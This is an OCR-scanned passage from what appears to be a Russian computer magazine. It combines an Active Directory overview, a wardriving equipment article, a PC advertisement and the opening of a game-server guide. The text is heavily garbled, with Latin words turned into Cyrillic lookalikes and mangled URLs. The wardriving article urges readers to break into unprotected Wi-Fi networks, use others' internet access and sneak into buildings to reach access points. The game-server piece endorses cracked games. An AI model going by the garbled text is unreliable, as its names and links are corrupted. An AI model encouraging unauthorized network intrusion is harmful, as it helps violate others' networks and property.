сеть, я создал корневой каталог фирмы, а в 
его поддиректории поместил различные отде- 
лы: бухгалтерию, менеджеров и т.п., после че- 
го объединил их в единую структуру. Осуще- 
ствил, так сказать, привязку к местности. Од- 
на из контор со временем открыла еще нес- 
колько офисов в области. Но и это не беда. 
Несколько деревьев для каждого из офисов и 
обозначенные связи между ними - это оказа- 
лось идеальным выходом из данной ситуации. 

А ГПОБОПЬНОЕ 

ОДИИНИСТРИРОВПНИЕ 

Самый главный конек АО - это единое адми- 
нистрирование. В Асйѵе Эігесіогу отсутствует 
понятие главного и резервного контроллеров 
доменов. Все контроллеры выполняют одни и 
те же функции, и все они равны между со- 
бой. Администратор может сделать измене- 
ния на любом из них, и эти изменения тут же 
будут отображены на всех остальных. Это на- 
зывается репликацией доменов. 

Вся инфа хранится централизованно, хотя и 
синхронизируется между разными доменами, 
и это дает великолепную возможность гло- 
бального администрирования. Использова- 
ние службы Асйѵе Эігесіогу освобождает ад- 
министраторов от ручной конфигурации каж- 
дой из машин. Если, например, нужно изме- 
нить права доступа к какому-то из объектов, 
то эти изменения можно производить сразу 
для всей сети. 

В средних и корпоративных сетях эта возмож- 
ность здорово избавляет от головной боли. 
Особенно если учитывать, что Асбѵе Эігесіогу 
имеет целый ряд интуитивно понятных адми- 




Редактирование учетных записей 




Связь Асііѵе Рігесіогу с другими технологиями и приложениями 



нистраторских утилит, в частности, знакомую 
всем консоль управления. Утилита поддержи- 
вает бгад’п’сігор, поэтому вкупе с объектным 
подходом АЭ можно админить сеть одной 
только мышкой. Я иногда сам удивляюсь, нас- 
колько толково специалисты МісгозоЙ подош- 
ли к этому вопросу. Реальная ситуация: сижу 
дома, звонят с работы и требуют срочно при- 
ехать, так как в одной из бухгалтерий сломал- 
ся принтер и нужно перевести всю ее работу 
на другой сетевой. Зачем ехать? Буквально 
несколькими кликами мышки я подключил к 
каталогу бухгалтеров нужный принтер сосед- 
него отдела, и... вуаля! Готово! Необходимые 
драйверы и ассоциации на компьютерах этого 
отдела установились автоматически. 

Со стороны, конечно, может показаться, что 
я несколько перехваливаю технологию. И 
знаешь, возможно, это действительно так. 
Объясняю почему. На этапе установки Асйѵе 
Эігесіогу - это далеко не послушная девушка, 
выполняющая все прихоти и желания, а кап- 
ризная девчонка, которая всегда норовит 
сделать все по-своему. И я не шучу. Прежде 
чем вся система АЭ нормально заработала, 
мне пришлось изрядно попыхтеть и провести 
не одну ночь на работе. Именно ночь, потому 
как остановка работы всей локальной сети 
днем - непозволительная роскошь. 

А ИЗЯЩНЫЕ ПРИЕМЫ админов 

С точки зрения удобства администрирования, 
в крупной локалке предпочтительнее создать 
дерево доменов, в каждом из которых нала- 




л Прежде чем нач- 
нешь эксперимен- 
тировать с уста- 
новкой Асііѵе 
йігесіогу в реаль- 
ной локальной се- 
ти, рекомендую 
поиграться с вир- 
туальными маши- 
нами. Идеально 
подойдет ѴМѴѴаге 
или ѴігіиаІРС 2004. 
Наберешься опы- 
та, что уже хоро- 
шо, но при этом и 
косяков никаких не 
устроишь. 
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а Служба активных 
каталогов в винде - 
это не уникальное 
изобретение. Дол- 
гое время подоб- 
ный механизм ис- 
пользовался в 
МоѵеІІ ейігесіогу 
(ѵѵѵш.поѵеІІ.сот/рг 
осіисіз/есіігесіогу). 




С помощью этого окошка можно разграничивать права для каждой группы пользователя сети 




Перемещаем объект в другой контейнер 



дить групповую политику с дифференциро- 
ванными правами доступа. Асііѵе Бігесіогу та- 
кой подход поддерживает на все 100%. Раз- 
решения поступают сверху вниз по дереву, 
при этом пользователи не только получают 
возможность читать свои разрешения с конт- 
роллера домена, но и при соответствующей 
привилегии могут сами создавать новых 
пользователей и назначать им права. 

Налицо очередное упрощение жизни админи- 
страторов :). Администрируя крупную локал- 
ку, ты можешь смело возложить все полно- 
мочия по созданию новых учетных записей 
подчиненному тебе лицу. Действительно, за- 
чем заниматься такой ерундой и тратить свое 
драгоценное время? :) Тем более, отследить 



все внесенные изменения не проблема. Да и 
едва ли помощник сможет что-то сделать не 
так - права-то четко ограничены. 

Следующей вкусной фишкой является подде- 
ржка технологии Аиіотаіесі 8оЙѵѵаге 
ОізІгіЬийоп. Вещь воистину изумительная. На 
первый взгляд, ее задачи не такие уж и 
сложные: она всего лишь отвечает за автома- 
тическое распространение программ и фай- 
лов по сети. Но на практике она показывает 
себя с самой лучшей стороны. Например 
ничто не мешает тебе настроить автомати- 
ческое обновление пользовательских антиви- 
русных баз или распространить единый об- 
новленный прайс-лист среди менеджеров. 
Согласись, идеи не лишены смысла. 

Но и это еще не все. Все действия, которые 
можно совершить через консоль управления, 
также реализуемы путем написания специ- 
альных сценариев. Так, если тебе по долгу 
службы приходится делать одно и то же в 
консоли управления, то тебе сам Бог велел 



заняться разработкой сценариев. Написан- 
ные на Яве или ѴізиаІ Вазіс’е скрипты пре- 
доставляют шикарную возможность автома- 
тизированно добавлять, изменять, переме- 
щать и копировать объекты, а также выпол- 
нять другие административные функции в 
рамках Асйѵе Бігесіогу. 

А ИНТЕГРОЦИЯ С 0И8 

Ориентироваться среди 1 0-30 объектов в се- 
ти - сущие пустяки. Но добавь к ним еще хо- 
тя бы сотню, и найти нужный тебе объект в 
этом хаосе будет ой как затруднительно. 
Именно поэтому Асйѵе Оігесіогу в качестве 
идентификационной службы использует до- 
менную систему имен. Да-да, ту самую сис- 
тему, которая используется в инете. 

Для самых маленьких напомню, что такое 
□N8 (Ботаіп Иате 8узіет). Каждая машина 
в сети, будь то сервер или домашний компь- 
ютер ламера, идентифицируется ІР-адресом. 
И если к ламеру коннектиться, в общем-то, 
незачем, то к какому-нибудь серверу, хостя- 
щему, например, ѵѵѵшакер.ги, обращаться 
приходится достаточно часто. Однако мы не 
набираем в браузере его адрес, а просто 
указываем ѵѵѵшакер.ги. В этом-то и заключает- 
ся роль ОИ8. Если объяснять все в двух сло- 
вах, то БМ8 - это база данных доменов, к 
каждому из которых привязан определенный 
ІР-адрес. То есть для хакер. ру указан 
194.67.128.2, а для паіі.ги - другой (лень было 
сделать резолв и получить 194 . 67 . 57 . 26 ? - Прим, 
ред.). Когда в строке адреса ты указываешь 
доменное имя, программа коннектится к 
ОМ8-серверу (чаще всего к ближайшему), 
чтобы получить привязанный к домену ІР и 
подсоединиться к нему. 

В Асііѵе Оігесіогу имена доменов ѴѴіпсІоѵѵз N1 
также являются именами ОИ8. Поэтому адрес 
з4ер@туІосаІ.сот может быть трактован как ад- 
рес электронной почты в инете, так и именем 
пользователя в локальном домене туіосаі.сот. 

А ЮЗЕРСКИЙ РОЙ В 00’У 

Однако поиск нужного ресурса осуществим 
не одними только средствами БМ8. В арсе- 
нале службы каталогов имеются и более 
мощные средства поиска ресурсов в сети. 
Пользователи или администраторы могут 
даже не знать точного названия нужной им 




Компьютеры в домене Сопіозо 



МППЕНЬКИЕ ПОЛЕЗНОСТИ РДМИНИСТРРТОРЯ 



омзит 

(ИПр://зирроП.тісгозоЙ.сот/сІеІаиІІ.азрх?зсісІ=кЬ;ги;321045&РгосІисІ=ѵѵ 
ІП2000ІМ). Утилита предназначена для диагностики основных проб- 
лем с ОЫЗ. Режимов диагностики (проверки ОЫЗ-записей) всего 
три: 

сіпзііпі /сі - проверка возможных причин неправильного делегирова- 
ния и связанные неполадки службы ОЫЗ; 

сіпзііп* /ці - проверка набора ОЫЗ-записей на нескольких серверах 
ЭЫЗ; 

сіпзііпі/асі - проверка РЫЗ-записей, используемых для репликации 
Асбѵе йігесіогу. 

Программа работает через командную строку и выдает свой отчет в 
формате НТМІ_. 

йссііад (ѵѵѵѵѵѵ.тісгозоЙ.сот/ѵѵіпсІоѵѵз2000/ІесИіп!о/гезкі1/ІооІз/пеѵѵ/сІссІі- 
ад-о.азр). Если решишь всерьез заняться изучением Асбѵе 
Оігесіогу, то с этой программой тебе придется познакомиться в обя- 
зательном порядке. Для чего она нужна? Рссііад (сокращение от 
ТНе Оотаіп СопігоІІег Ріадпозбс іооі) используется для анализа сос- 
тояния контроллеров домена. Если в сети есть какие-то серьезные 
проблемы, то бссііад сразу же после диагностики забьет тревогу. 
Рекомендаций по их решению тебе, конечно, она не даст. Но если 
ты знаешь, где нужно искать проблему, - это уже хорошо. По умол- 
чанию, то есть при запуске через командную строку без парамет- 
ров, утилита проверяет работоспособность на минимальном уровне 
- работает или нет. Используя другие командные ключи, можно на- 
ладить более искушенное тестирование. 

Меісііад 

(ѵѵѵѵѵѵ.тісгозоЙ.сот/ѵѵіпсІоѵѵз2000ЛесІііпЬ/гезкіШооІз/ехізбпд/пеІсІіад- 
о.азр). Представленная утилита также относится к типу диагности- 
рующих и является своеобразным тестером сетевых соединений. 
Ыеісііад собирает всю доступную информацию о сетевых компонен- 
тах, проверяет драйверы и производительность сети. В процессе 
своей работы она может выявить проблемы, а в ряде случаев даже 
локализовать их. Утилита не имеет каких-либо ключей, поэтому ис- 
пользовать ее крайне просто. Запусти ее и изучай результат. 
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ОКТИВНЫЕ ДИРЕКТОРИИ 



ПРЕДОКРПНЯЙСЯ! 



ь. 



Совместно с технологией Асбѵе Рігесіогу, как правило, применяют 
распределенную модель защиты, основанную на протоколе автори- 
зации КегЬегоз. Благодаря этой системе, разработанной в Массачу- 
сетском технологическом институте, стало возможным производить 
аутентификацию пользователя даже по открытым сетям, не боясь 
за сохранность конфиденциальных данных. КегЬегоз уже успел за- 
рекомендовать себя в ряде *піх-систем и теперь фактически стал 
стандартом среди протоколов для проверки подлинности пользова- 
теля в сети. 

Общая идея работы протоколы такова: если клиенту необходимо 
подключиться к какому-либо защищенному ресурсу, то он посылает 
соответствующий запрос на сервер. Такой запрос содержит всю не- 
обходимую для идентификации информацию, которая идет в за- 
шифрованном виде. Сервер проверяет полномочия клиента и в за- 
висимости от результата отсылает либо сообщение об ошибке, ли- 
бо специальный дополнительный временный ключ, опять же, в за- 
кодированном виде. Последний, естественно, передается не забавы 
ради: в дальнейшем с его помощью будет шифроваться вся пере- 
даваемая информация. А учитывая тот факт, что время жизни клю- 
ча ограничено, то им криптуются и все последующие временные 
ключи, регулярно создаваемые и передаваемые сервером. 
Регулярная смена ключей шифрования значительно повышает бе- 
зопасность канала. Тем более что, помимо всего прочего, КегЬегоз 
осуществляет еще взаимную проверку подлинности (клиент иденти- 
фицирует сервер, сервер идентифицирует клиента). 

Кстати, лица, которые не имеют разрешения КегЬегоз, вполне могут 
залогиниться в сеть, но только при выполнении некоторых условий. 
В частности, каждый гость должен иметь сертификат типа Х.509 ѵЗ 
РиЫіс Кеу СегШісаіез, выдаваемый специально уполномоченным 
лицом локалки. Таким образом, пользователь отличной от ѴѴіпсІоѵѵз 
ІМТ операционной системы может получить доступ к необходимым 
ресурсам наравне с имеющим разрешение КегЬегоз. 

Ложка дегтя, правда, все же есть. Таить не буду, время от времени 
в КегЬегоз находят уязвимости. Пускай нечасто, но каждый год со- 
ответствующие сообщения появляются в лентах баг-трака. И дело 
здесь даже не в алгоритмах шифрования - они надежны как швей- 
царские часы. Чаще всего это БоЗ-атаки, деактивирующие исполь- 
зование протокола КегЬегоз. Чуть реже встречаются ошибки пов- 
торного освобождения памяти (ОоиЫе Ргее РІаѵѵ). 





Мониторинг работы АР можно производить сторонними средствами. 
Например программой АроІІо (ѵшоіпіегпаіз.сот) 




На изящности поиска радости пользователя 
не заканчиваются. Приятно и то, что все 
учетные записи хранятся в домене, а это зна- 
чит, что каждый юзер, по сути, может вос- 
пользоваться любой машиной в сети. Хотя, 
по правде говоря, этим сейчас никого не 
удивишь. Зато такая инновация, как техноло- 
гия ІпіеІІіМіггог, способна вызвать детскую 
радость даже у искушенных пользователей. 

С ее помощью можно воспользоваться любой 
машиной в сети и получить перед глазами 
свой рабочий стол, настройки и документы. 
Впечатляющая вещь. 

А ХОЧУ ЕЩЕ 

Я надеюсь, ты усвоил самое главное. Асйѵе 
Оігесіогу сейчас активно внедряется и ис- 
пользуется для облегчения управления мно- 
гочисленными сетевыми ресурсами внутри 
локальных сетей. Чем объемнее сеть, тем ак- 
туальнее использование этой технологии. Хо- 
тя последнее оправдано в любом случае. 
Возможно, кто-то, дочитав до конца, задастся 
вопросом: ну а где же настройки, технические 
рекомендации и конкретные рецепты? Изви- 
ни, коллега, не в этот раз. Сегодня я тебе дал 
информацию, достаточную для начального оз- 
накомления с АО. Чтобы полностью понять 
архитектуру и использование АО, нужна как 
минимум хорошая книжка и пара дюжин под- 
робных Ноѵѵ То. Многое здесь познается толь- 
ко на своем собственном опыте. Уж поверь 
мне - проверено лично. Но я надеюсь, мы те- 
бе такой опыт устроим. Согласен? 




^ѵшѵѵ.пеіѵѵогк- 
сіос. ги/ТМез/іпзор/а 
(1/ргіпШтІ?асІ200 
О- 1 .ИІтІ - подроб- 
ный мануал по ус- 
тановке службы ка- 
талогов Асііѵе 
йігесіогу. 

^ѵѵѵѵѵѵ.діІеѵ.ги/1с/А0 
ІоМС.Ніт - анало- 
гичная статья, 
только от другого 
автора. 

^ѵѵѵѵѵѵ.сегШіса- 
Ііоп.ги/ІіЬгагу/агІі- 
сІезсІіг/Ьід49.ИІтІ? 
25 - статья осве- 
щает аспекты 
Асііѵе йігесіогу и 
□N3 (часть I). 
іѵѵш. сегШіса- 
Ііоп.ги/ІіЬгагу/саІа- 
Іод/шаІегіаІз/1 5тіп 
иі/іпсіех.ИІтІ - цикл 
статей по админи- 
стрированию. 
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машины, принтера и т.п., но без труда най- 
дут их. Для того чтобы провести поиск, впол- 
не достаточно знать хотя бы одну из характе- 
ристик необходимого объекта. Допустим, в 
ответ на запрос «найти все принтеры в цент- 
ральном офисе» каталог выдаст сведения обо 



всех принтерах со свойством «центральный 
офис». То есть в домене Асііѵе Оігесіогу нуж- 
ные объекты можно находить по самым раз- 
личным признакам. Пользователя, например, 
стоит искать по его имени или имени компь- 
ютера, адресу электронной почты и т.п. 
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Вкладка «Политики групп» в окошке свойств одного из доменов 
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0 отличие от нормального, настольного взпома, во взломе мобильном одним еіНеіпеі-адаптером ипи стареньким Ліаіир-модемом ограни- 
читься не попучится. Для мобипьлого, а то и беспроводного взпома, как минимум требуется что-нибудь мобипьное. Каламбур, но так 
и есть. Можно, конечно, таскать с собой в специапьной сумке свой 30-кипограммовый системник, скромно надеясь, что это не вызыва- 
ет разных необычных эмоций у зрителей этого действа, но, честно говоря, это мало комфортно. Я предпочитаю что-нибудь более изящное. 



различные девайсы даа Беспроводного взпома и развлечений 



А 



А ПЕТС ГОУ! 

В Москве и прочих крупных го- 
родах беспроводных сетей не 
просто много, а очень много. 
Чаще всего они ничем не за- 
щищены и являются отличным 
завтраком для начинающего 
ѵѵігеіезз-хакера. Ему только и 
надо, что приконнектиться к 
найденной на просторах города точке, а 
дальше он может до умопомрачения лазить 
по ресурсам внутренней сети, использовать 
чужой доступ в интернет и вообще безоб- 
разничать, сколько его не самой безгрешной 
душе угодно. Но как это не печально, боль- 
шинство ѵѵігеіезз точек доступа расположено 
в центре города, где максимальна концент- 
рация разного рода хитрых организаций, в 
которых эти девайсы востребованы. А так 
как не каждый хакер, тем более хакер бесп- 
роводных сетей, живет в центре, ему прихо- 
диться временно на момент взлома или по- 
иска сети передислоцироваться в боѵѵпіоѵѵп. 
Причем и хакеру, и его оборудованию. 
Следовательно, оборудование у хакера 
должно быть максимально мобильным. И 
сам хакер должен быть максимально мо- 
билен. Самый оптимальный и, возможно, 



единственный выход для использования в 
беспроводном взломе называется «хакер на 
машине». Скорость обнаружения сетей очень 
велика. Если ехать 70-80 км/ч по централь- 
ным городским улицам (по Тверской, напри- 
мер) засекаться будут все беспроводные се- 
ти, которые вообще могли засечься. При об- 
наружении вкусной сети, которую прямо так 
и хочется с ног до головы поломать, просто 



паркуешься где-нибудь, где сигнал доста- 
точно сильный, и спокойно работаешь в ма- 
шине на своем хакерском оборудовании. 
Желательно, чтобы у машины были тониро- 
ванные стекла, потому что не стоит лишний 
раз палиться, да и вообще так прикольнее. 
Машина, как видишь, - ВЕЩЬ, но что делать 
роуминг-юзерам, у которых отобрали права 
за вождение в нетрезвом виде в неположен- 
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ИНСТРУМЕНТЫ ДЛЯ ВРРДРРЙВИНГР 




ных местах без денег? Или людям, которым 
по тем же причинам эти права не хотят выда- 
вать? Или, в конце концов, людям, у которых 
по тем или иным идейным соображением ма- 
шины в наличии не имеется? У них тоже есть 
выход. Наверное, чуть более палевный, впол- 
не может быть, что значительно менее уют- 
ный, но ни чуть не менее юзабельный. О том 
как его реализовать, о том какое необходимо 
оборудование для комфортного вардрайвин- 
га, о том, почему, если пицца знает, что она 
готова, я знаю, что пицца готова, но тем не 
менее ей еще жариться 1 0 минут и еще о 
чем-то - читай ниже. 

А НОУТБУК + ДЕВОЙСЫ 

Как ты, конечно, понимаешь, основным обо- 
рудованием для взлома чего-либо компью- 
терного является сам компьютер. Как след- 
ствие, для хака ѵѵігеіезз-сетки без него обой- 
тись тоже очень сложно - придется эту проб- 
лему решать. По моему скромному мнению, 
ноутбук - оптимальный выход для большин- 
ства хакеров. Но только хороший мобильный 
бук, долго работающий от батарейки, и такой 
бук, который не развалится у тебя в руках 
(никаких намеков на красную сборку). 

Под хорошим мобильным ноутбуком я подра- 
зумеваю сабноут (уменьшенный до крохотных 



размеров полноценный бук). За 
счет миниатюрных размеров его 
можно юзать не только в маши- 
не. Его можно достать, скажем, 
в кафе, положить на коленки, и 
никто не заметит! Отличным 
примером подобного ноутбука 
является Азиз 3200 (насколько 
мне известно, подобной тулзой 
уже обзавелись Горлум и N30). 
Весом всего 800 с лишним 
грамм и размером с книжку, он 
представляет собой весьма 
мощный ПК со всеми необходи- 
мыми хакеру возможностями. 
ѴѴігеІезз-адаптер, сетевуха, мо- 
дем, несколько изЬ-портов. 

Этот бук - невероятно удобная 
вещица. Но одним им ограничи- 
вать себя не стоит, если хочешь 
действительно комфортно ломать :). Нужен 
нормальный (а не встроенный) адаптер 
802.1 1 д. Дело в том, что у буков я ни разу не 
встречал выходов на внешнюю антенну для 
ѴѴіРі, а ведь это очень большой недостаток. 
ѴѴігеІезз-хакеру антенна порой бывает очень 
нужна. Допустим, точка доступа в недосягае- 
мости, где-то высоко или далеко. Тогда 
внешняя антенна (сделанная из банки из-под 
ананасов) решит эту проблему. 

Уже намечается некоторый набор оборудова- 
ния: сабноут, ѴѴіРі -адаптер, антенна. Чего-то 
не хватает? Честно говоря, уже можно ехать 
и ломать все и вся, но для действительно 
комфортного взлома понадобится еще один 
интересный девайсик. Когда едешь на маши- 
не с включенным ноутбуком где-нибудь в 
центре и постоянно видишь всплывающие на 
экране сообщения об обнаруженной точке, 
так и хочется эту точку на карте города отме- 
тить, а потом вернуться и поломать. Хочется 
не только мне, но и талантливым кодерам, 
которые написали программу МеІЗШтЫег, 
которая фиксирует в логах не только данные 
о точке, но и ее координаты, которые должны 
быть любезно предоставлены чем? Правиль- 
но, системой спутниковой навигации. ОРЗ- 
приемник - вещь при сборе данных абсолют- 
но незаменимая. Возможность сделать карту 



беспроводных точек доступа потрясает. 
Представь себе: поездил на своей машине 
или на такси по городу, насканил кучу сетей, 
а потом можешь выборочно ломать/не ло- 
мать только там, где тебе хочется. Удобно! 
СРЗ-приемники подключаются к буку обычно 
либо через ІІЗВ, либо через СОМ, либо, что 
реже, через рстсі. Стамблер работает на 
данный момент с дрз только через СОМ, поэ- 
тому упор стоит делать именно на этот порт. 
Если на твоем буке нет СОМ'а - ты без проб- 
лем сможешь купить за пару-другую баксов 
переходник ІІЗВ2СОМ, который решит эту 
смешную проблему. 

А КПК * ДЕВОЙСЫ 

С буком все понятно, хорош - нет слов. Но 
иногда оказывается, что предоставляемая бу- 
ком мобильность недостаточна для требова- 
тельного ѵѵігеіезз-хакера. К примеру, если 
точка доступа располагается где-нибудь внут- 
ри здания, и наружу никак не добивает, то что 
делать? Пробиваться в здание - это элемен- 
тарно. Но с буком тебя там легко заметят. 
Можно, конечно, ходить с включенным, но уб- 
ранным в рюкзак\сумку сабноутом, но так ты 
лишаешься всякого взаимодействия с компь- 
ютером (кроме, разве что, наушника, который 
можно вытащить из сумки). 

Именно для таких хитрых случаев может при- 
годиться КПК. Большинство современных 
карманных компьютеров бизнес-класса уже 
давно стали оборудоваться ѴѴіРі-адаптерами. 
Так почему бы не использовать их как инстру- 
мент для взлома? Ведь большая часть хакерс- 
кого софта уже была перенесена на мобиль- 
ные платформы (МеІЗШтЫег, например, ра- 
ботает под СЕ), другую же часть с помощью 
рубрики Кодинг и подсказок на форумах без 
проблем сможешь портировать ты сам. 

Одно большое достоинство КПК - это их срав- 
нительно небольшая стоимость. Простые мо- 
дели могут стоить раз в 5-6 дешевле нормаль- 
ного сабноута. Но в простых нет ѴѴіРі. Печаль- 
но, без ѴѴіРі взломать беспроводную сеть бу- 
дет сложновато. Придется исправлять эту 
проблему с помощью внешнего адаптера. Он 
может подключаться как через СотрасІРІазІі, 
так и через ЗОЮ, забив тем самым драгоцен- 
ный слот расширения, в который, будь КПК 
уже со встроенной ѴѴіРі-карточкой, можно бы- 
ло бы вставить ОРЗ-приемник. Т.е. КПК смо- 
жет заменить бук почти во всем, кроме разве 
что комфортной работы. Экран-то маленький, 
время работы мизерное, клавиатура вообще 
экранная, нормальная - только как аксессуар. 

В общем, для исключительных случаев КПК 
подходит. Даже для составления ѴѴіРі-карты 
подходит, но для постоянной работы и взлома 
на нем - ни коим образом. 





л На ѵѵѵѵѵѵ.доодіе.сот 
ты без особых проб- 
лем сможешь отко- 
пать фактически 
любую информацию 
по данной теме. 



а Подробнее о прог- 
рамме МеЙІитЫег 
ты можешь прочесть 
на сайте ѵѵѵш. 
МеіЗйшіЫег.сот, 
там же можно ска- 
чать версию для 
настольного и мо- 
бильного компьютера. 



Ноутбук А$и$ 5200И 



6РЗ-приемник формата 5Р 
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Список найденных точек доступа 



А ОПЫЕРНОТИВЫ 

Всегда есть что-то еще. Карманником и бу- 
ком список средств для вардрайвинга не ог- 
раничивается. К примеру, есть умельцы, 
ухитряющиеся встроить полноценный компь- 
ютер с АТХ-вым корпусом и монитором себе 
в машину. Подключают питание специальным 
образом к аккумулятору, выводят антенну от 
ѴѴіРі -карточки наружу - и вперед, колесить по 
улицам города, ломать бедные беззащитные 
беспроводные сети. Способ чреват потерей 
компьютера (могут попросту спереть, как 
магнитолу), разрядкой аккумулятора и чудо- 



вищным геморроем. Хотя кому-то наверняка 
он кажется лучшим из возможных. 

Также скоро будут появляться мобильные те- 
лефоны с поддержкой ѴѴіРі. Естественно, тот 
час же они будут использованы как инстру- 
мент для беспроводного взлома. Хотя на та- 
ком маленьком экране совсем не понятно, 
что будет видно. 

Главное, используя тот или иной девайс, по- 
заботиться о сроке его работы. Будет очень 
обидно, если ноутбук вырубиться как раз во 
время атаки, или КПК заснет, когда ты будет 
подъезжать к центру. Для сабноутов отлич- 
ным решением будет дополнительная внеш- 



няя батарея. Лишние два часа работы (а то 
и все четыре) - это очень хорошее подспорье 
в нашем деле. Для КПК (хотя и для 
буков тоже) может пригодиться зарядка от 
автомобильного прикуривателя. Вещь совер- 
шенно незаменимая, ибо ресурсы батареи 
КПК ограничены куда сильнее бука, особен- 
но, когда к нему подключены ѴѴіРі-адаптер 
и система спутникового позиционирования. 

А НПФИГ С ПЕСНЕЙ! 

Как видишь, список инструментов вардрайве- 
ра не ограничивается одной машиной. Хотя, 
сама машина - вещь в деле фактически неза- 
менимая. Это и способ относительно быстро- 
го передвижения по улицам города (когда 
пробок нет), и источник питания для обору- 
дования (пока аккумулятор не сядет), и прос- 
то комфортное обиталище для хакера в хо- 
лодную зимнюю пору. 

В общем, собирай девайсы, и вперед, и с 
песней! ЗС 
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К-8іу1е 



Ргохіта ® МС-е 



МРЗ 



ФИЛЬМЫ 



ДОКУМЕНТЫ 



ФОТО 



Приобрети мечту! 



Благодаря мощному процессору Іпіеі® Репііит® 4 520 с технологией НТ 
информационно-развлекательный центр К-81у1е® Ргохіта® 
с легкостью один справляется с теми задачами, которые раньше 
выполняли БѴБ-рекодер, видеомагнитофон, караоке, 
музыкальный центр, игровая приставка и компьютер... 

Не вставая с дивана: смотрите и записывайте ТѴ и ШЭ-фильмы, 
слушайте и сочиняйте музыку, играйте в игры, бродите по Интернет, 
занимайтесь фото и видео... 

Всем покупателям В-81уІе Ргохіта МС-е предоставляется 30 -ти дневный 
бесплатный доступ к книгам , энциклопедиям, МРЗ музыке, играм, урокам 
и тренингам на платном Интернет ресурсе ѵір.кт.ги 



Технические характеристики 
развлекательно-информационного центра 
К-81у1е® Ргохіта® МС-е: 

Процессор Іпіеі® Репііит® 4 520 с технологией Нурег-ТЬгеасііп§ 
Операционная система: Місгозой® Ѵіпскжз® ХР Месііа Сепіег Есііііоп 

Набор микросхем: Іпіеі® 9150 
Оперативная память: 2*25бМВ ОВК400 
Видеоподсистема: Іпіеі® СгарЫсз Месііа Ассеіегаіог 900 
Жесткий диск: 120ОВ 5АТА 
Привод: ШО+/-Ш 

РІазЪ сагйз геайег: М5 /ЗБ&ММС /СР /ЗМС 

Сеть: 802.1 1 Ь/§ хѵіге1е§§ ЕіНегпеі; 10/100 МЬ/з ЕіНегпеі 

Передняя панель: ІЕЕЕ 1 394, 2*ШВ, 5РБ1Е іп оріісаі, МІС іп, ШЕ оиі 



В комплект поставки входят: Информационно-развлекательный центр Р-8іуІе® Ргохіта® МС-е; 

Пульт дистанционного управления; Беспроводная клавиатура; Беспроводная мышь; Руководство пользователя. 



Астрахань ТАН (8512) 394-254 Братск Байт (395-3) 411-121 Владивосток ЭР-Стайл ДВ (4232) 205-410 
Воронеж Элмар Трейд (0732) 512-018 Калининград Балтик Стайл (011) 254-11-98 Кемерово 
Конкорд ПРО (3842) 357-888 Кострома ИТ-Профессионал (0942) 626-903 Краснодар ВСС Сотрапу 
(8612) 640-450 Красноярск ЛанСервис (3912) 239-342 Москва К-5іу1е Тгас1іп§ (095) 514-14-14, 
Компания К-5іу1е (095) 514-14-10, Профит-М (095) 786-77-37, Прайм Труп (095) 725-4432/33, Сибкон 
(095) 292-50-12 Экселент (095) 955-13-26 Нижний Новгород ЭР-Стайл Волга (8312) 464-328, 461-622 
Новосибирск ЭР-Стайл Сибирь (383-2) 661-167 Пенза ЭЛСИ (841-2) 544-141 Пермь ЭР-Стайл Кама 
(3422) 107-445 Петрозаводск Илвес (8142) 762-288 Петропавловск-Камчатский АМН (4152) 168-751 
Ростов-на-Дону ЭР-Стайл Дон (863) 252-48-13 Санкт-Петербург ЭР-Стайл СПБ (812) 445-34-18/17 
Тамбов Гитон (0752) 719-754 Тула ПитерСофт-НТ (0872) 355-500 Уфа Онлайн (3472) 248-228 
Хабаровск ЭР-Стайл ДВ регион (4212) 314-530 




К* 8іу1е 

М Р II Т Е К 3 



Техническая поддержка: К-Зіуіе Сотриіегз (095) 514-1417 
\тогѵ.г-8Іу1е-сотриІег8.ги 

Сделано е России. Сделано на совесть! 



Іпіеі, Іпіеі 1о§о, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі Сепігіпо, Іпіеі Сепігіпо Іодо, Сеіегоп, Іпіеі Хеоп, Іпіеі 5реес15іер, Ііапіит, Репііит, апсі Репііит III Хеоп аге ігасіетагкз ог гедізіегесі ігасіетагкз оі Іпіеі Согрогаііоп ог Из зиЬзісііагіез іп іЬе ІІпііесІ Зіаіез апсі оіНег соипігіез. 








статье пойдет речь о том, каким образом организовать на рабочем месте свой игровой сервер с поддержкой двух игр: ЦиакеЗ и Соопіег- 
Зігіке, а также о том, как правипьно все это добро настроить. Какой же ты админ, еспи в твоей сетке нет виртуапьного поприща доя игр 
и развпечений? 



кок правильно поставить и настроить сервер? 



л 



.і С0ІІІІТЕВ-ТЕВШІ8Т1ИШ! 

0 ля начала скажу, что серверы 
бывают двух типов: зіеат и 
позіеат (платные и бесплат- 
ные). Чем же они отличают- 
ся? Начиная с версии 1 .6 наш 
любимый КС стал платным. 
Сейчас же, если есть желание 
играть на платных серверах, 
необходимо иметь у себя на 
машине клиентский софт, созданный разра- 
ботчиками. Имя ему зіеат. Сам клиент 
бесплатный, и скачать его можно с иѵшіеат- 
роѵѵегеб.сот. Также тебе потребуется ориги- 
нальный ключ (сб-кеу) для НаІМіІе, чтобы 
активировать контру и позволить играть в 
нее через зіеат, который, к слову, весит по- 
рядка четырехсот мегабайт. Вот именно на 
таких геймеров и рассчитаны зіеат-серве- 
ры. У нас в России, как всегда, все сделано 
просто и через десятое колено. Конечно, уже 
все сломано, так что сервер и клиент будут 
немного отличаться от оригинальных. Соби- 
раешься играть на буржуйских серверах - ка- 
чай зіеат и покупай халфу. Хочешь гамать 
только на отечественных серверах? В таком 
случае сливай уже крякнутую игрушку и 
ставь последний патч. Если конкретнее, то 
сервер позіеат от зіеат отличается только 



измененной зѵѵсіз.сііі в винде или 
епдіпе_іххх.зо в линухе, где ххх - версия яд- 
ра, которая может принимать значения 486, 
686 либо атб. А еще может быть атсІ64, но 
аспирина под нее я пока не встречал. Вот и 
все, чем отличаются серверы сами по себе. 

В статье будет рассмотрена установка и 
настройка как тех, так и других. 

Если ты не определился с тем, какой сервер 
выбрать, то надо понимать, на какую аудито- 
рию ты рассчитываешь. Еще было бы пра- 
вильно оценить свое оборудование, на кото- 
ром будет установлена площадка для игр. 
Сервер нормально может себя ощущать на 
машине с каналом более 1 0 Мбит. Для по- 
вышения эффективности скорее стоит уве- 
личивать оперативную память, нежели ста- 
вить более мощный процессор. Хотя ты дол- 
жен помнить, что процессор - тоже не деся- 
тое дело. Ну а если ты счастливый облада- 
тель канала в 1 00 Мбит, то можешь смело 
считать свой сервер одним из самых лучших 
в России - это я тебе точно говорю :). 

А Н0СТР0ЙК0 СЕРВЕРО 

Нет смысла описывать все настройки, пото- 
му что их несложно найти с помощью любо- 
го поисковика. Каждый конфигурирует сер- 
